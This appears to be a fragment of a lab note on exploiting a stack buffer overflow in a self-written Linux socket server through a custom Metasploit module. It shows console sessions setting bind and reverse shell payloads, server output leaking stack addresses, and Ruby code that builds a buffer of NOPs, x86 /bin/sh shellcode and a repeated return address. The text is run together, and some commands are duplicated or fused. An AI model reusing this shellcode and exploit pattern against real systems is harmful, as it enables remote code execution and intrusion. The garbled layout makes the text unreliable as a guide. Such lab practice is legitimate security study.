msf > use exploit/linux/myvictimmsf  exploit(myvictim) > set payload linux/x86/set payload linux/x86/metsvc_bind_tcp     set payload linux/x86/shell_reverse_tcp2set payload linux/x86/metsvc_reverse_tcpmsf  exploit(myvictim) > set payload linux/x86/metsvc_bind_tcppayload => linux/x86/metsvc_bind_tcpmsf  exploit(myvictim) > set rhost 10.10.10.133rhost => 10.10.10.133msf  exploit(myvictim) > set rport 7777rport => 7777msf  exploit(myvictim) > exploit[*] Started bind handler[*] Sending 116 byte payload...[*] Exploit completed, but no session was created.

bai@ubuntu:/mnt/hgfs/r/stack$ ./serversocketbindlistenserver is run...acceptThe IP of client is:10.10.10.128The Port of client is:52308close-new_fd 2recvacceptsp=0xbffff488,addr=0xbffff4a4 bytes.

‘MyVictimSever run on linux‘,{‘Platform‘ => ‘Linux‘,‘Ret‘      =>  0xbffff4a4}

# Build the buffer for transmission        buf="";        buf  = make_nops(15);        buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"         buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"         buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";        #buf+="\xa4\xf4\xff\xbf"        #buf += payload.encoded        buf += [].fill( target.ret,0,100).pack(‘V*‘)

msf  exploit(myvictim) > rexploit[*] Reloading module...[*] Started bind handler[*] Sending 116 byte payload...[*] Exploit completed, but no session was created.

The IP of client is:10.10.10.128The Port of client is:47336close-new_fd 2acceptrecvsp=0xbffff488,addr=0xbffff4a4 bytes.$ $